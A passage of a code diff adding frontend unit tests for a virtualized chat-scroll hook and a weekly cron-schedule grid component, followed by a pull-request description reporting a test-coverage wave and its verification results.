+    const { view, initialProps } = mountHook(sessionId, items, sc, { streamingIndex: lastIdx })
+    const rows: HTMLElement[] = []
+    for (let i = 0; i <= lastIdx; i++) {
+      const node = mkRow(ITEM_H)
+      rows.push(node)
+      act(() => { view.result.current.measureRef(i)(node) })
+    }
+    act(() => { vi.advanceTimersByTime(HEIGHT_SYNC_MS) })
+    return { sc, view, initialProps, rows, lastIdx }
+  }
+
+  const HEIGHT_SYNC_MS = 120
+  const GRACE_MS = 400
+
+  it('reverts the just-ended streaming row to the debounced path once the grace expires', () => {
+    const { view, initialProps, rows, lastIdx } = mountStreaming('grace-expiry')
+    const baseline = view.result.current.totalHeight
+
+    // Turn closes: the caller stops naming the row.
+    act(() => { view.rerender({ ...initialProps, streamingIndex: undefined }) })
+    // Inside the grace, a trailing resize still tracks immediately.
+    act(() => { latestRo().fire([resizeTo(rows[lastIdx], ITEM_H + 20)]) })
+    act(() => { vi.advanceTimersByTime(16) })
+    expect(view.result.current.totalHeight).toBe(baseline + 20)
+
+    // The grace is a FIXED window from the transition, never re-armed by a
+    // resize — so an oscillating widget cannot hold the row on the immediate
+    // path forever. Past it, the row is debounced again.
+    act(() => { vi.advanceTimersByTime(GRACE_MS) })
+    act(() => { latestRo().fire([resizeTo(rows[lastIdx], ITEM_H + 60)]) })
+    act(() => { vi.advanceTimersByTime(16) })
+    expect(view.result.current.totalHeight).toBe(baseline + 20)
+
+    // …and lands once the debounce elapses.
+    act(() => { vi.advanceTimersByTime(HEIGHT_SYNC_MS) })
+    expect(view.result.current.totalHeight).toBe(baseline + 60)
+  })
+
+  it('cancels a pending grace when a new turn starts streaming', () => {
+    const { view, initialProps, rows, lastIdx } = mountStreaming('grace-cancel')
+    const baseline = view.result.current.totalHeight
+
+    // Turn closes (grace armed for the tail row), then a NEW turn immediately
+    // starts streaming a different row — the pending grace must be dropped.
+    act(() => { view.rerender({ ...initialProps, streamingIndex: undefined }) })
+    act(() => { view.rerender({ ...initialProps, streamingIndex: lastIdx - 1 }) })
+
+    // Well inside the old grace window: with it cancelled, a resize on the
+    // previously-streaming row takes the debounced path.
+    act(() => { vi.advanceTimersByTime(100) })
+    act(() => { latestRo().fire([resizeTo(rows[lastIdx], ITEM_H + 30)]) })
+    act(() => { vi.advanceTimersByTime(16) })
+    expect(view.result.current.totalHeight).toBe(baseline)
+
+    act(() => { vi.advanceTimersByTime(HEIGHT_SYNC_MS) })
+    expect(view.result.current.totalHeight).toBe(baseline + 30)
+  })
+})
+
+// ---------------------------------------------------------------------------
+// ResizeObserver first mount — a row measured for the first time must follow
+// only while the viewport is already pinned to the bottom.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: first-mount measurement', () => {
+  let origRO: typeof ResizeObserver | undefined
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    FakeResizeObserver.instances = []
+    origRO = globalThis.ResizeObserver
+    globalThis.ResizeObserver = FakeResizeObserver as unknown as typeof ResizeObserver
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+    globalThis.ResizeObserver = origRO as typeof ResizeObserver
+    globalThis.requestAnimationFrame = origRaf
+  })
+
+  /**
+   * Registers a row whose height is 0 at ref time, so measureRef does NOT seed
+   * the cache — the first real height then arrives via the observer, which is
+   * the genuine first-mount signal.
+   */
+  function registerUnmeasured(view: ReturnType<typeof mountHook>['view'], index: number) {
+    const node = mkRow(0)
+    act(() => { view.result.current.measureRef(index)(node) })
+    return node
+  }
+
+  it('follows a freshly measured row while the viewport is pinned to the bottom', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 2000, clientHeight: 400 })
+    const { view } = mountHook('fm-follow', mkItems(21), sc)
+    expect(sc.el.scrollTop).toBe(1600)
+
+    const node = registerUnmeasured(view, 20)
+    sc.state.scrollHeight = 2500
+
+    act(() => { latestRo().fire([resizeTo(node, 260)]) })
+
+    // New content at the bottom of a followed transcript — pin to the new end.
+    expect(sc.el.scrollTop).toBe(2100)
+  })
+
+  it('does not yank a scrolled-up reader when a row above them is measured', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 2000, clientHeight: 400 })
+    const { view } = mountHook('fm-no-yank', mkItems(21), sc)
+
+    // User scrolls up; let the post-scroll settle window elapse so the result
+    // reflects the follow decision rather than the anti-fling gate.
+    act(() => { sc.state.scrollTop = 300; sc.el.dispatchEvent(new Event('scroll')) })
+    act(() => { vi.advanceTimersByTime(300) })
+
+    const node = registerUnmeasured(view, 18)
+    sc.state.scrollHeight = 2400
+    act(() => { latestRo().fire([resizeTo(node, 300)]) })
+
+    expect(sc.el.scrollTop).toBe(300)
+  })
+
+  it('ignores resize entries for nodes it never registered', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 2000, clientHeight: 400 })
+    const { view } = mountHook('fm-unknown', mkItems(21), sc)
+    const before = view.result.current.totalHeight
+
+    act(() => { latestRo().fire([resizeTo(mkRow(999), 999)]) })
+    act(() => { vi.advanceTimersByTime(200) })
+
+    expect(view.result.current.totalHeight).toBe(before)
+  })
+})
+
+// ---------------------------------------------------------------------------
+// Append settle frame — the pin runs synchronously (pre-paint, no flicker) and
+// again next frame, once the new row's real height is known.
+// ---------------------------------------------------------------------------
+describe('useVirtualChat: append settle frame', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+  let frames: FrameRequestCallback[]
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    frames = []
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => {
+      frames.push(cb)
+      return frames.length
+    }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  const drain = () => {
+    let guard = 0
+    while (frames.length > 0 && guard++ < 10) {
+      const batch = frames.splice(0, frames.length)
+      act(() => { batch.forEach((cb) => cb(0)) })
+    }
+  }
+
+  function mountAttached(sessionId: string, count: number) {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: count * ITEM_H, clientHeight: 400 })
+    document.body.appendChild(sc.el)
+    const mounted = mountHook(sessionId, mkItems(count), sc)
+    drain()
+    return { sc, ...mounted }
+  }
+
+  it('re-pins next frame once the appended row has been measured', () => {
+    const { sc, view, initialProps } = mountAttached('append-settle', 21)
+    expect(sc.el.scrollTop).toBe(1700)
+
+    // One new message: the synchronous pin uses the geometry available before
+    // paint, which still excludes the new row's real height.
+    act(() => {
+      sc.state.scrollHeight = 2200
+      view.rerender({ ...initialProps, items: mkItems(22) })
+    })
+    expect(sc.el.scrollTop).toBe(1800)
+
+    // The row measures taller than the estimate, moving the bottom again.
+    sc.state.scrollHeight = 2400
+    drain()
+
+    expect(sc.el.scrollTop).toBe(2000)
+    sc.el.remove()
+  })
+
+  it('re-pins next frame after a bulk history hydration', () => {
+    const { sc, view, initialProps } = mountAttached('append-bulk-settle', 2)
+
+    act(() => {
+      sc.state.scrollHeight = 20000
+      view.rerender({ ...initialProps, items: mkItems(200) })
+    })
+    expect(sc.el.scrollTop).toBe(19600)
+
+    // Late measurement of the hydrated tail grows the content once more.
+    sc.state.scrollHeight = 20400
+    drain()
+
+    expect(sc.el.scrollTop).toBe(20000)
+    sc.el.remove()
+  })
+})
+
+// ---------------------------------------------------------------------------
+// window.__vcSnapshot — the diagnostic probe used to debug scroll geometry.
+// ---------------------------------------------------------------------------
+interface VcSnapshot {
+  sessionId: string
+  count: number
+  measured: number
+  estimated: number
+  estimatedHeight: number
+  windowRange: { start: number; end: number }
+  endIsCount: boolean
+  offsetBefore: number
+  offsetAfter: number
+  totalHeight: number
+  geom: { scrollTop: number; scrollHeight: number; clientHeight: number; distanceFromBottom: number } | null
+  children: { tag: string; aria: string | null; h: number; cls: string }[]
+  mountedRows: { index: number; cached: number | undefined; dom: number; delta: number }[]
+  stick: boolean
+  lastWriteTop: number
+}
+
+const readProbe = () =>
+  (window as unknown as { __vcSnapshot?: () => VcSnapshot }).__vcSnapshot
+
+describe('useVirtualChat: __vcSnapshot debug probe', () => {
+  let origRaf: typeof globalThis.requestAnimationFrame
+
+  beforeEach(() => {
+    localStorage.clear()
+    vi.useFakeTimers()
+    vi.spyOn(console, 'log').mockImplementation(() => {})
+    vi.spyOn(console, 'table').mockImplementation(() => {})
+    origRaf = globalThis.requestAnimationFrame
+    globalThis.requestAnimationFrame = ((cb: FrameRequestCallback) => { cb(0); return 0 }) as typeof requestAnimationFrame
+  })
+  afterEach(() => {
+    vi.restoreAllMocks()
+    globalThis.requestAnimationFrame = origRaf
+    vi.useRealTimers()
+  })
+
+  it('reports live geometry, the mounted window, and cached-vs-DOM heights', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const spacer = document.createElement('div')
+    spacer.setAttribute('aria-hidden', 'true')
+    spacer.className = 'vc-spacer'
+    sc.el.appendChild(spacer)
+    const { view } = mountHook('probe-full', mkItems(21), sc)
+
+    // One row measured, then silently grown in the DOM: the probe exists to
+    // surface exactly this drift between the cache and the live element.
+    const row = mkRow(ITEM_H)
+    act(() => { view.result.current.measureRef(20)(row) })
+    Object.defineProperty(row, 'offsetHeight', { configurable: true, get: () => 220 })
+
+    const snap = readProbe()?.()
+    expect(snap).toBeDefined()
+    expect(snap?.sessionId).toBe('probe-full')
+    expect(snap?.count).toBe(21)
+    expect(snap?.measured).toBe(1)
+    expect(snap?.estimated).toBe(20)
+    expect(snap?.endIsCount).toBe(true)
+    expect(snap?.geom).toEqual({
+      scrollTop: 2600, scrollHeight: 3000, clientHeight: 400, distanceFromBottom: 0,
+    })
+    expect(snap?.mountedRows).toEqual([{ index: 20, cached: ITEM_H, dom: 220, delta: 120 }])
+    expect(snap?.children).toEqual([
+      { tag: 'div', aria: 'true', h: 0, cls: 'vc-spacer' },
+    ])
+    expect(snap?.stick).toBe(true)
+    // Every row now resolves to ITEM_H: the one measurement matches the
+    // estimate, so the running mean it feeds leaves the unmeasured rows alone.
+    expect(snap?.totalHeight).toBe(21 * ITEM_H)
+    expect(snap?.offsetBefore).toBe(snap!.windowRange.start * ITEM_H)
+  })
+
+  it('reports null geometry and no rows when the scroller is not attached', () => {
+    mountHook('probe-detached', mkItems(5), null)
+
+    const snap = readProbe()?.()
+    expect(snap?.geom).toBeNull()
+    expect(snap?.children).toEqual([])
+    expect(snap?.mountedRows).toEqual([])
+    expect(snap?.measured).toBe(0)
+    expect(snap?.lastWriteTop).toBe(-1)
+  })
+
+  it('removes its own probe on unmount', () => {
+    const sc = makeScroller({ scrollTop: 0, scrollHeight: 3000, clientHeight: 400 })
+    const { view } = mountHook('probe-cleanup', mkItems(5), sc)
+    expect(readProbe()).toBeTypeOf('function')
+
+    act(() => { view.unmount() })
+
+    expect(readProbe()).toBeUndefined()
+  })
+})

--- a/website/src/test/WeekGridCoverage.test.tsx
+++ b/website/src/test/WeekGridCoverage.test.tsx
@@ -1,0 +1,281 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { screen, fireEvent, act } from '@testing-library/react'
+import WeekGrid, { parseCronSlots } from '../components/WeekGrid'
+import { renderWithProviders } from './helpers'
+import type { CronJob } from '../types'
+
+/** Tuesday 17:00 UTC — pinned so weekday, week dates and the now-line are
+ *  deterministic regardless of the host clock or DST. */
+const NOW = new Date('2026-05-12T17:00:00Z')
+/** 17:20 UTC on the same day, used as an interval-job anchor timestamp. */
+const ANCHOR_TS = Math.floor(new Date('2026-05-12T17:20:00Z').getTime() / 1000)
+
+const job = (overrides: Partial<CronJob> = {}): CronJob => ({
+  id: 'j1',
+  name: 'nightly report',
+  message: 'run it',
+  enabled: true,
+  schedule: '0 9 * * 1',
+  last_status: 'ok',
+  cron_expr: '0 9 * * 1',
+  timezone: 'UTC',
+  ...overrides,
+})
+
+describe('parseCronSlots — interval schedules', () => {
+  beforeEach(() => {
+    vi.useFakeTimers({ now: NOW })
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('parses a sub-hour interval out of the schedule string and emits one slot per hour cell', () => {
+    const slots = parseCronSlots(
+      job({ cron_expr: null, every_secs: null, schedule: 'every 900s' }),
+      'UTC',
+    )
+    // 24 hours x 7 days: a 15-minute job fires inside every hour cell.
+    expect(slots).toHaveLength(168)
+    expect(new Set(slots.map(s => s.minute))).toEqual(new Set([0]))
+  })
+
+  it('reads the hour suffix form ("every 2h") and emits each fire time', () => {
+    const slots = parseCronSlots(
+      job({ cron_expr: null, every_secs: null, schedule: 'every 2h' }),
+      'UTC',
+    )
+    expect(slots).toHaveLength(84) // 12 fires x 7 days
+    const hours = [...new Set(slots.map(s => s.hour))].sort((a, b) => a - b)
+    expect(hours).toEqual([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22])
+  })
+
+  it('anchors an hourly interval on the job creation timestamp', () => {
+    const slots = parseCronSlots(
+      job({ cron_expr: null, every_secs: 3600, created_ts: ANCHOR_TS }),
+      'UTC',
+    )
+    expect(slots).toHaveLength(168) // 24 fires x 7 days
+    const hours = [...new Set(slots.map(s => s.hour))].sort((a, b) => a - b)
+    expect(hours).toHaveLength(24)
+    // Every fire sits at the same offset inside its hour.
+    expect(new Set(slots.map(s => s.minute)).size).toBe(1)
+  })
+
+  it('anchors a daily-or-longer interval on the last run timestamp', () => {
+    const slots = parseCronSlots(
+      job({ cron_expr: null, every_secs: 86_400, last_run_ts: ANCHOR_TS }),
+      'UTC',
+    )
+    expect(slots).toHaveLength(7)
+    expect(new Set(slots.map(s => s.hour))).toEqual(new Set([17]))
+    expect(new Set(slots.map(s => s.minute))).toEqual(new Set([20]))
+  })
+
+  it('ignores a zero interval and falls through to the cron expression', () => {
+    const slots = parseCronSlots(job({ every_secs: 0, cron_expr: '0 9 * * 1' }), 'UTC')
+    expect(slots).toHaveLength(1)
+    expect(slots[0].hour).toBe(9)
+  })
+})
+
+describe('parseCronSlots — cron expression fields', () => {
+  beforeEach(() => {
+    vi.useFakeTimers({ now: NOW })
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('returns no slots for an expression that is not five fields', () => {
+    expect(parseCronSlots(job({ cron_expr: '0 9 * *' }), 'UTC')).toEqual([])
+  })
+
+  it('treats day-of-week 7 as Sunday', () => {
+    const slots = parseCronSlots(job({ cron_expr: '0 12 * * 7' }), 'UTC')
+    expect(slots).toHaveLength(1)
+    expect(slots[0].day).toBe(6) // grid is Monday-first, so Sunday is index 6
+  })
+
+  it('de-duplicates day-of-week 0 and 7 into a single Sunday column', () => {
+    const slots = parseCronSlots(job({ cron_expr: '0 12 * * 0,7' }), 'UTC')
+    expect(slots).toHaveLength(1)
+    expect(slots[0].day).toBe(6)
+  })
+
+  it('expands comma lists and ranges', () => {
+    const slots = parseCronSlots(job({ cron_expr: '0,30 8-9 * * 1,3' }), 'UTC')
+    expect(slots).toHaveLength(8) // 2 minutes x 2 hours x 2 days
+    expect([...new Set(slots.map(s => s.hour))].sort((a, b) => a - b)).toEqual([8, 9])
+    expect([...new Set(slots.map(s => s.minute))].sort((a, b) => a - b)).toEqual([0, 30])
+  })
+
+  it('applies a step to an explicit range', () => {
+    const slots = parseCronSlots(job({ cron_expr: '0 8-14/3 * * 1' }), 'UTC')
+    expect([...new Set(slots.map(s => s.hour))].sort((a, b) => a - b)).toEqual([8, 11, 14])
+  })
+
+  it('applies a step to a wildcard field', () => {
+    const slots = parseCronSlots(job({ cron_expr: '0 */6 * * 1' }), 'UTC')
+    expect([...new Set(slots.map(s => s.hour))].sort((a, b) => a - b)).toEqual([0, 6, 12, 18])
+  })
+
+  it('drops unparseable and out-of-range field values', () => {
+    const slots = parseCronSlots(job({ cron_expr: 'x,99,15 9 * * 1' }), 'UTC')
+    expect(slots).toHaveLength(1)
+    expect(slots[0].minute).toBe(15)
+  })
+
+  it('yields nothing when every value in a field is out of range', () => {
+    expect(parseCronSlots(job({ cron_expr: '99 9 * * 1' }), 'UTC')).toEqual([])
+  })
+})
+
+describe('WeekGrid rendering', () => {
+  beforeEach(() => {
+    vi.useFakeTimers({ now: NOW })
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('renders a Monday-first header with the current week dates in the render TZ', () => {
+    renderWithProviders(<WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />)
+
+    expect(screen.getByText('Mon')).toBeInTheDocument()
+    expect(screen.getByText('Sun')).toBeInTheDocument()
+    // Week of Monday 2026-05-11 through Sunday 2026-05-17.
+    expect(screen.getByText('05/11')).toBeInTheDocument()
+    expect(screen.getByText('05/17')).toBeInTheDocument()
+  })
+
+  it('marks the current day column as today', () => {
+    renderWithProviders(<WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />)
+
+    // NOW is a Tuesday, so only the Tue column is accented.
+    expect(screen.getByText('Tue').parentElement?.className).toContain('text-accent')
+    expect(screen.getByText('Wed').parentElement?.className).toContain('text-muted')
+  })
+
+  it('renders all 24 hour rows', () => {
+    renderWithProviders(<WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />)
+
+    expect(screen.getAllByText(/^([01]\d|2[0-3]):00$/)).toHaveLength(24)
+  })
+
+  it('renders no dots and no legend when there are no jobs', () => {
+    renderWithProviders(<WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />)
+
+    expect(screen.queryAllByRole('button')).toHaveLength(0)
+  })
+
+  it('falls back to the resolved local timezone when no render TZ is given', () => {
+    renderWithProviders(<WeekGrid jobs={[job()]} onSelect={vi.fn()} />)
+
+    expect(screen.getAllByText(/^([01]\d|2[0-3]):00$/)).toHaveLength(24)
+    // The job still lands somewhere on the grid, whatever the host zone is.
+    expect(screen.getAllByRole('button', { name: /nightly report at/ })).toHaveLength(1)
+  })
+
+  it('places one dot per slot, labelled with the time in the render TZ', () => {
+    renderWithProviders(<WeekGrid jobs={[job()]} onSelect={vi.fn()} renderTz="UTC" />)
+
+    const dot = screen.getByRole('button', { name: 'nightly report at 09:00 UTC' })
+    expect(dot).toHaveAttribute('title', 'nightly report — 09:00 UTC')
+  })
+
+  it('calls onSelect when a dot is clicked', () => {
+    const onSelect = vi.fn()
+    const j = job()
+    renderWithProviders(<WeekGrid jobs={[j]} onSelect={onSelect} renderTz="UTC" />)
+
+    fireEvent.click(screen.getByRole('button', { name: 'nightly report at 09:00 UTC' }))
+    expect(onSelect).toHaveBeenCalledWith(j)
+  })
+
+  it('rings the dots of the selected job only', () => {
+    const jobs = [job(), job({ id: 'j2', name: 'weekly digest', cron_expr: '0 10 * * 1' })]
+    renderWithProviders(<WeekGrid jobs={jobs} selectedId="j2" onSelect={vi.fn()} renderTz="UTC" />)
+
+    expect(screen.getByRole('button', { name: 'weekly digest at 10:00 UTC' }).className)
+      .toContain('ring-2')
+    expect(screen.getByRole('button', { name: 'nightly report at 09:00 UTC' }).className)
+      .not.toContain('ring-2')
+  })
+
+  it('dims a paused job and says so in the dot tooltip', () => {
+    renderWithProviders(
+      <WeekGrid jobs={[job({ enabled: false })]} onSelect={vi.fn()} renderTz="UTC" />,
+    )
+
+    const dot = screen.getByRole('button', { name: 'nightly report at 09:00 UTC' })
+    expect(dot).toHaveAttribute('title', 'nightly report (paused) — 09:00 UTC')
+    expect(dot.className).toContain('opacity-30')
+  })
+
+  it('renders a legend entry per job and selects from it', () => {
+    const onSelect = vi.fn()
+    const jobs = [job(), job({ id: 'j2', name: 'weekly digest', cron_expr: '0 10 * * 1' })]
+    renderWithProviders(
+      <WeekGrid jobs={jobs} selectedId="j1" onSelect={onSelect} renderTz="UTC" />,
+    )
+
+    const legendEntry = screen.getByRole('button', { name: 'weekly digest' })
+    expect(screen.getByRole('button', { name: 'nightly report' }).className).toContain('font-medium')
+    expect(legendEntry.className).toContain('text-muted')
+
+    fireEvent.click(legendEntry)
+    expect(onSelect).toHaveBeenCalledWith(jobs[1])
+  })
+
+  it('marks a paused job as paused in the legend', () => {
+    renderWithProviders(
+      <WeekGrid jobs={[job({ enabled: false })]} onSelect={vi.fn()} renderTz="UTC" />,
+    )
+
+    expect(screen.getByRole('button', { name: 'nightly report (paused)' })).toBeInTheDocument()
+  })
+
+  it('gives each job its own colour, cycling once the palette runs out', () => {
+    const jobs = Array.from({ length: 9 }, (_, i) =>
+      job({ id: `j${i}`, name: `job-${i}`, cron_expr: `0 ${i} * * 1` }),
+    )
+    renderWithProviders(<WeekGrid jobs={jobs} onSelect={vi.fn()} renderTz="UTC" />)
+
+    const first = screen.getByRole('button', { name: /^job-0 at/ }).className
+    const ninth = screen.getByRole('button', { name: /^job-8 at/ }).className
+    // Palette has 8 entries, so the ninth job reuses the first colour.
+    expect(ninth.split(' ').filter(c => c.startsWith('bg-')))
+      .toEqual(first.split(' ').filter(c => c.startsWith('bg-')))
+  })
+
+  it('advances the now-line as the clock ticks', () => {
+    const { container } = renderWithProviders(
+      <WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />,
+    )
+
+    const line = () => container.querySelector<HTMLElement>('.pointer-events-none.z-10')
+    // 17:00 exactly → the line sits at the top of the 17:00 row.
+    expect(line()?.style.top).toBe('0%')
+
+    act(() => {
+      vi.advanceTimersByTime(30 * 60_000)
+    })
+    // 17:30 → halfway down the same row.
+    expect(line()?.style.top).toBe('50%')
+  })
+
+  it('re-reads the clock when the render timezone changes', () => {
+    const { container, rerender } = renderWithProviders(
+      <WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="UTC" />,
+    )
+    const rows = () => container.querySelectorAll('.pointer-events-none.z-10').length
+
+    expect(rows()).toBe(7) // one segment per day column, on the current hour row
+    rerender(<WeekGrid jobs={[]} onSelect={vi.fn()} renderTz="Asia/Kolkata" />)
+    expect(rows()).toBe(7)
+    // 17:00 UTC is 22:30 in Asia/Kolkata, so the line moved to the 22:00 row.
+    expect(container.querySelector<HTMLElement>('.pointer-events-none.z-10')?.style.top)
+      .toBe('50%')
+  })
+})


### PR DESCRIPTION
## What

Frontend coverage wave: **20 new test suites + 1 extended** over SPA surfaces that had little or no unit coverage. **Tests only — zero production files change**, so nothing here can alter runtime behaviour.

Frontend line coverage measured ~80.2% on `main` while the Coverage Gate floor still sits at **60%**. This wave exists so the floor can be ratcheted afterwards on a number `main` has actually held (the gate's own ratchet policy: never raise above the lowest recent `main` measurement). The ratchet itself is a separate PR.

## New suites (`website/src/test/`)

`ActivityViewer` · `AppDetailPage` · `ArtifactDeployPage` · `CfgTab` · `ColorCustomizer` · `DevFleetPage` · `FileExplorerPage` · `IssueRadarIssueDetail` · `KnowledgeIndex` · `MarkdownPanelMore` · `MarkdownRenderer` · `OfficeScene` · `PreferencesTab` · `ProjectsPage` · `SettingsChatPanel` · `SlidePreview` · `SourcesList` · `TerminalRegistry` · `UseVirtualChat` · `WeekGrid`

**Extended** — `AppRootCoverage` now reaches the App shell paths no other `App.*.test.tsx` covers:

- the version-change changelog gate (`mc-last-version` diffing and section filtering) plus the changelog modal's own controls
- `handleUpdate` (success and both error shapes) and the `UpdateOverlay` progress / failed / stuck states it mounts
- the header capsule's resource-posture segment and the system-metrics segment's error and no-totals branches
- the credits modal with a bonus pool and a signed-in identity
- the notification popover's pointer-outside and route-change dismissals
- developer mode and the Electron native-menu navigation bridge

## Verification

| gate | result |
|---|---|
| new tests | **734 passed** (21 files), re-run after the rebase onto current `main` |
| full frontend suite | **15,970 passed** / 1 failed — the single failure is `UseWebSocketCoverage.test.tsx`, `main`'s own breakage tracked in #2705 (this PR never touches that file) |
| `tsc --noEmit` | exit 0 |
| `eslint src` | 0 errors, 598 warnings — under the 1116 ratchet |
| `jscpd` | 0 clones |

The authoritative coverage delta comes from this run's **Coverage Gate** job summary; local report generation was not used for the number.

## Risk

None to production code. Worst case is a flaky new test, which shows up in this suite alone.
